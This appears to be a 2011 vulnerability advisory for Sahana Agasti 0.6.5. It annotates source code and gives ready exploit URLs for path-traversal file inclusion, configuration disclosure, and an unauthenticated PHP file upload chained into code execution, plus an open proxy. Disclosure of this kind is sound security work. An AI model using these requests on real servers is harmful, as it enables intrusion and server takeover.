Sahana Agasti 0.6.5 Local File Inclusion / Shell Upload

`:::::::-. ... ::::::. :::.  
;;, `';, ;; ;;;`;;;;, `;;;  
`[[ [[[[' [[[ [[[[[. '[[  
$$, $$$$ $$$ $$$ "Y$c$$  
888_,o8P'88 .d888 888 Y88  
MMMMP"` "YmmMMMM"" MMM YM  
  
[ Discovered by dun \ posdub[at]gmail.com ]  
[ dun / 2011-01-07 ]  
#############################################################  
# [ Sahana Agasti <= 0.6.5 ] Multiple Vulnerabilities #  
#############################################################  
#  
# Script: "Agasti is the PHP based project of the Sahana Software Foundation.  
# Based a long-term preparedness for disaster management..."  
#  
# Script site: http://www.sahanafoundation.org/  
# Download: https://launchpad.net/sahana-agasti/  
#  
  
[LFI] Vuln: ( Scenario 1)  
http://site.com/sahana-0.6.5/www/stream.php?stream_type=/../../../../../../../../../etc/passwd%00  
File: ./sahana-0.6.5/www/stream.php  
  
20 $global['approot'] = realpath(dirname(__FILE__)).'/../';  
21 // $global['approot'] = '/usr/local/bin/sahana/';  
22 $global['previous']=false;  
...(CUT)...  
39 if(!$global['previous']){  
40 $global['action'] = (NULL == $_REQUEST['act']) ?  
41 "default" : $_REQUEST['act'];  
42 $global['module'] = (NULL == $_REQUEST['mod']) ?  
43 "home" : $_REQUEST['mod'];  
44 }  
45 $global['stream_type'] = $_GET['stream_type']; // [1]  
...(CUT)...  
52 shn_front_controller();  
...(CUT)...  
64 function shn_front_controller()  
65 {  
66 global $global;  
67 global $conf;  
68 $approot = $global['approot'];  
69 $action = $global['action'];  
70 $module = $global['module'];   
...(CUT)...   
90 if($global['stream_type'] && file_exists($approot.'/inc/lib_st_'.$global['stream_type'].'.inc') ){// [2]  
91 require_once ($approot.'/inc/lib_st_'.$global['stream_type'].'.inc'); // [3] LFI  
92 if(file_exists($approot.'/mod/'.$module.'/'.$global['stream_type'].'.inc'))  
93 $default_file = $approot.'/mod/'.$module.'/'.$global['stream_type'].'.inc';  
94 else  
95 $default_file = 'stream.inc';  
96 }   
  
  
In this scenario script try to include something like this:  
/var/www/apache/sahana/www/..//inc/lib_st_/../../../../../../../../../etc/passwd\0.inc  
  
################################################################################################################################  
  
[LFI] Vuln: ( Scenario 2)  
http://site.com/sahana-0.6.5/www/stream.php?mod=/../../../../../../../../../etc/passwd%00  
File: ./sahana-0.6.5/www/stream.php  
42 $global['module'] = (NULL == $_REQUEST['mod']) ?  
43 "home" : $_REQUEST['mod'];  
...(CUT)...   
70 $module = $global['module'];   
...(CUT)...   
90 if($global['stream_type'] && file_exists($approot.'/inc/lib_st_'.$global['stream_type'].'.inc') ){  
91 require_once ($approot.'/inc/lib_st_'.$global['stream_type'].'.inc');  
92 if(file_exists($approot.'/mod/'.$module.'/'.$global['stream_type'].'.inc'))  
93 $default_file = $approot.'/mod/'.$module.'/'.$global['stream_type'].'.inc';  
94 else  
95 $default_file = 'stream.inc';  
96 }else  
97 $default_file = 'main.inc'; // [1]  
98   
99 // include the correct module file based on action and module  
100 $module_file = $approot.'mod/'.$module.'/'.$default_file; // [2]  
101 if (! file_exists($module_file)) { //  
102 $module_file = $approot.'mod/home/'.$default_file;  
103 }  
...(CUT)...   
109 //Include the module file  
110 include($module_file); // [3] LFI  
  
In this scenario script try to include something like this:  
/var/www/apache/sahana/www/../mod//../../../../../../../../../etc/passwd\0/main.inc  
  
################################################################################################################################  
  
[LFI] Vuln: ( Scenario 3 without file_exists)  
http://site.com/sahana-0.6.5/www/stream.php?act=adm&mod=/../../../../../../../../../etc/passwd%00  
File: ./sahana-0.6.5/www/stream.php  
  
42 $global['module'] = (NULL == $_REQUEST['mod']) ? // [1]  
43 "home" : $_REQUEST['mod'];  
...(CUT)...   
84 if (preg_match('/^adm/',$action)) { //  
85 $module = 'admin'; // [2]  
86 $action = 'modadmin'; //  
87 }  
...(CUT)...   
96 }else  
97 $default_file = 'main.inc'; // [3]  
98   
99 // include the correct module file based on action and module  
100 $module_file = $approot.'mod/'.$module.'/'.$default_file; // [4] ( /var/www/apache/sahana/www/../mod/admin/main.inc )  
...(CUT)...  
110 include($module_file); // [5]  
...(CUT)...   
125 $module_function = 'shn_'.$module.'_'.$action; // [6]  
126 if (!function_exists($module_function)) { //  
127 $module_function='shn_'.$module.'_default';  
128 }  
129 $_SESSION['last_module']=$module;  
130 $_SESSION['last_action']=$action;  
131 $output = $module_function(); // [7] ( shn_admin_modadmin() )  
  
File: ./sahana-0.6.5/mod/admin/main.inc  
  
161 function shn_admin_modadmin()  
162 {  
163 global $global;  
164   
165 // include original module admin section  
166 include $global['approot']."/mod/".$global['module']."/admin.inc"; // [8] LFI  
  
In this scenario script try to include something like this:  
/var/www/apache/sahana/www/..//mod//../../../../../../../../../etc/passwd\0/admin.inc  
  
################################################################################################################################  
  
[Configuration disclosure] Vuln:  
http://site.com/sahana-0.6.5/www/stream.php?mod=admin&act=conf_list  
File: ./sahana-0.6.5/www/stream.php  
  
100 $module_file = $approot.'mod/'.$module.'/'.$default_file; // [1] ( /var/www/apache/sahana/www/../mod/admin/main.inc )   
...(CUT)...   
110 include($module_file); // [2]  
...(CUT)...   
125 $module_function = 'shn_'.$module.'_'.$action; // [3]  
126 if (!function_exists($module_function)) {  
127 $module_function='shn_'.$module.'_default';  
128 }  
129 $_SESSION['last_module']=$module;  
130 $_SESSION['last_action']=$action;  
131 $output = $module_function(); // [4] ( shn_admin_conf_list() )  
  
File: ./sahana-0.6.5/mod/admin/main.inc   
31 include_once $global['approot']."mod/admin/conf_admin.inc"; // [5]  
  
File: ./sahana-0.6.5/mod/admin/conf_admin.inc  
22 function shn_admin_conf_list() // [6] Configuration disclosure  
...(CUT)...   
  
We can prepare function name, with using GET variables (mod, act)  
We can use prepared functions with "shn_" prefix, with bypassing admin privileges  
So lets see what next..  
  
################################################################################################################################  
  
[Arbitrary File Upload] Vuln:  
http://site.com/sahana-0.6.5/www/stream.php?mod=admin&act=lc_file_browser  
File: ./sahana-0.6.5/www/stream.php  
  
131 $output = $module_function(); // [1] ( shn_admin_lc_file_browser()   
  
File: ./sahana-0.6.5/mod/admin/main.inc   
  
683 function shn_admin_lc_file_browser() // [2] Arbitrary File Upload  
684 {  
685 global $global;  
686 $locale = $_POST['locale'];  
687 //$file_type=$_POST['file_type'];  
688 $uploaddir = "../res/locale/$locale/LC_MESSAGES/";  
689 //"../res/locale/$locale/LC_MESSAGES/";  
690 //echo $uploaddir;  
691 $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);  
692   
693 if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {  
694 add_confirmation('File uploaded sucessfully');  
695 }else {  
696 add_error('File uploaded failed');  
697 }  
698   
699 }  
  
We can upload some file to /res/locale/$locale/LC_MESSAGES/ (default $locale is my_MM),  
with using prepared POST  
Example:  
  
POST /sahana-0.6.5/www/stream.php?mod=admin&act=lc_file_browser HTTP/1.1  
Host: site.com  
User-Agent: Mozilla/5.0 Gecko/20101203 Firefox/3.6.13  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: pl,en-us;q=0.7,en;q=0.3  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 115  
Connection: keep-alive  
Content-Type: multipart/form-data; boundary=---------------------------11682257938924  
Content-Length: 420  
-----------------------------11682257938924  
Content-Disposition: form-data; name="MAX_FILE_SIZE"  
  
50000  
-----------------------------11682257938924  
Content-Disposition: form-data; name="userfile"; filename="file.txt"  
Content-Type: text/plain  
  
<?php phpinfo(); ?>  
-----------------------------11682257938924  
Content-Disposition: form-data; name="locale"  
  
my_MM  
-----------------------------11682257938924--  
  
File /res/locale/my_MM/LC_MESSAGES/file.txt is created  
We can use main.inc filename instead of file.txt  
So let's go back to LFI ( scenario 1,2 ):  
( scenario 1 ) http://site.com/sahana-0.6.5/www/stream.php?stream_type=/../../res/locale/my_MM/LC_MESSAGES/main  
( scenario 2 ) http://site.com/sahana-0.6.5/www/stream.php?mod=/..//res/locale/my_MM/LC_MESSAGES/  
It includes LC_MESSAGES/main.inc with our <?php phpinfo(); ?> (AFU+LFI=RCE)  
  
################################################################################################################################  
  
[PHP Proxy]  
http://site.com/sahana-0.6.5/www/res/lib_proxy.php?url=http://site2.com/dupa.php  
File: ./sahana-0.6.5/www/res/lib_proxy.php  
  
17 $url = $_GET['url'];  
18 $parseurl = urldecode($url);  
19  
20 // open cURL session  
21 $ch = curl_init();  
22 curl_setopt($ch, CURLOPT_POST,1);  
23 curl_setopt($ch, CURLOPT_URL,$parseurl);  
24 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);  
25 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);  
26 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);  
27  
28 $xml = curl_exec($ch);  
29 curl_close($ch);  
30  
31 header("Content-Type: text/xml");  
32  
33 echo $xml;  
  
################################################################################################################################  
And possible other bugs...  
################################################################################################################################  
  
`